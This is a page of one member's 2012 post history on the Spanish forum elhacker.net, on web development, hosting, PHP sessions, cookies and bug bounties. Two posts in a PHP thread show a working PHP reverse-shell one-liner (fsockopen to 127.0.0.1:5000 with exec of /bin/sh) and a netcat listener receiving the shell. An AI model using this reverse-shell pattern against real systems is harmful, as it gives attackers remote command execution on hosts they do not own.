elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: 1 2 3 4 5 [6] 7 8 9 10 11
51  Programación / Desarrollo Web / Re: Falta de inspiración...... en: 10 Julio 2012, 17:13 pm
yo ando en las mismas, ha decir verdad que programar web no ha pensado en crear un sitio que sea exitoso, el problema son las ideas como dices, nosotros pensamos que todo ya esta hecho y luego sale un nuevo servicio que se hace exitoso  :-(

quizás primero debas elegir alǵun rubro o categoría en la que quieras iniciar tu proyecto y luego realizar un brainstorm para obtener buenas ideas en el nicho elegido.

Saludos
52  Foros Generales / Foro Libre / Re: Piensasolutions: 3 dominios primer nivel por 9'90€ en: 9 Julio 2012, 22:39 pm
no conozco muhcos hosting de pago  :-(, pero al menos las características que ofrece 1&1 me parecen que son buenas y baratas, alguien conoce algún otro hosting con buenas características?

saludos
53  Programación / PHP / Re: duda PHP en: 5 Julio 2012, 22:30 pm
fedora..

Código:
[dr@dr ~]$ nc -l 5000
sh: no job control in this shell
sh-4.1$

saludos
54  Programación / PHP / Re: duda PHP en: 5 Julio 2012, 21:47 pm
Hola, interesante lo que posteas, podrias exaplicarme que realiza este comando?

Código:
/bin/sh -i <&3 >&3 2>&3\

se que ejecuta una shell pero mas aya de eso no entiendo :X

y en cuanto a tu problema a mi me resulto con:

Código:
system('php -r \'$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");\'');

saludos.
55  Programación / Scripting / Re: cargar una variable en javascript en: 3 Julio 2012, 21:21 pm
mm ni idea de ie8, pero el problema creo yo es que solo estas cambiando la variable pero no estas actualizando el embed.

para eso ponle un id al embed y en la función loader puedes poner algo como

Código:
document.getElementById("idembed").src = temp;

y eso debería funcionar.

saludos
56  Programación / Desarrollo Web / Re: Perfil de un Programador Web. en: 3 Julio 2012, 00:16 am
1)

Diseñador: se encarga de todo los relacionado a diseñar el sitio, en si crear las imagenes, logotipos, escoger fuentes, en si dibujar el sitio.

Programador: se encarga de programar las funcionalidades del sitio por ejemplo la sección de noticias, algun gestor de noticias, etc.

2) Depende de la empresa, si la empresa es grande y el proyecto web tambien, entonces es probable que exista un diseñador y un programador, pero en empresas chicas por lo general el programador tambien tiene que diseñar.

3) yo creo que los conocimientos mas básicos que deberia tener son:

-HTML
-javascript
-PHP / ASP
-CSS
-SQL

con eso se puede hacer una pagina decente creo yo, pero luego ya se necesitan cosas como xhtml, xml, html 5, jquery, etc.

Saludos
57  Seguridad Informática / Hacking / Re: ***Cookies*** en: 27 Junio 2012, 19:37 pm
pero si tu navegas por un sitio malicioso (que él controla) puede perfectamente extraer las las cookies almacenadas en tu ordenador utilizando simplemente javascript.

Seguro?, se supone que el navegador se encarga de que una pagina no pueda acceder a la información de otra página.

Saludos.
58  Programación / PHP / Re: Sistema de Login Seguro en: 23 Junio 2012, 00:12 am
mira no tengo mucha experiencia en logins, pero se que se hace con sesiones, es decir utilizas la variable $_SESSION[] y en ella vas guardando datos por ejemplo, cuando el usuario introduce el user y pass estos se deben comparar con una base de datos, si estan correctos se escribe en la sesion algun valor como

Código:
 $_SESSION['logeado']=TRUE; 

con eso despues verificas si ya esta logeado con un

Código:
if(!empty($_SESSION['logeado']))

El usuario no podra modificar este dato porque?,, porque el servidor le pasa una cookie al cliente con el nombre de phpsessionid y este solo contiene un id,, cuando el usuario se mete a la página este le manda la cookie phpsessionid al servidor y el servidor busca en sus sessiones activas la que tenga el id que le paso el cliente.Por ende es mas seguro chequear por session que por cookie. (Si me equivoco corrijanme porfa xD).

Saludos
59  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Resuelto - Volver a la interfaz (theme) viejo del foro. en: 22 Junio 2012, 23:52 pm
No se ve tan mal,, salvo el header que es muy pequeño al menos en resolucion de 1080p

Saludos
60  Foros Generales / Noticias / Re: PayPal también recompensará a los que encuentren fallos en sus productos en: 22 Junio 2012, 18:21 pm
Me parece bueno que paypal se una a esta manera de colaborar con los que descubren estas vuls, aunque muchas veces lo que dan es muy poco en comparación con el precio que se puede obtener si vendes el bug en el mercado negro xD.

Saludos

Páginas: 1 2 3 4 5 [6] 7 8 9 10 11
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines